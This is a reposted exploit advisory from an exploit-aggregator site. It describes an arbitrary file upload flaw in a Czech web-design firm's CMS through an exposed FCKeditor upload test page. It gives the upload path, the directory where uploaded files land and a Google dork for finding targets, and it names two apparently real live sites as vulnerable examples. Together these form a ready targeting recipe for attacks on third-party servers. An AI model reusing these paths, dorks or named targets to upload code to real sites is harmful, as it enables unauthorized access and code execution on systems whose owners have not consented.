Advertisement






Schwabe Slovakia WebDesign Studio Nandu Unauthorized File Insertion

CVE Category Price Severity
N/A CWE-264 $500 High
Author Risk Exploitation Type Date
Nandu High Remote 2019-05-21
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019050234

Below is a copy:

Schwabe Slovakia WebDesign Studio Nandu Unauthorized File Insertion
####################################################################

# Exploit Title : Schwabe Slovakia Studio Nandu Unauthorized File Insertion
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 21/05/2019
# Vendor Homepage : nandu.cz
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Copyright  2012 Schwabe Slovakia s.r.o., webdesign studio nandu
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Description About Software :
*****************************
Schwabe Slovakia Studio Nandu is a Web Design Company in Czech Republic.

####################################################################

# Impact :
***********
Schwabe Slovakia Studio Nandu is prone to a vulnerability that lets attackers 
upload arbitrary files because it fails to adequately sanitize user-supplied input. 

An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access 
or privilege escalation; other attacks are also possible.

####################################################################

# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
/admin/fckeditor/editor/filemanager/connectors/uploadtest.html

Directory File Path :
*******************
/_data_editor/[YOURFILENAME].txt .jpg .gif .png

####################################################################

# Example Vulnerable Sites :
************************
[+] sinupret.sk/admin/fckeditor/editor/filemanager/connectors/uploadtest.html

[+] kaloba.sk/admin/fckeditor/editor/filemanager/connectors/uploadtest.html

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum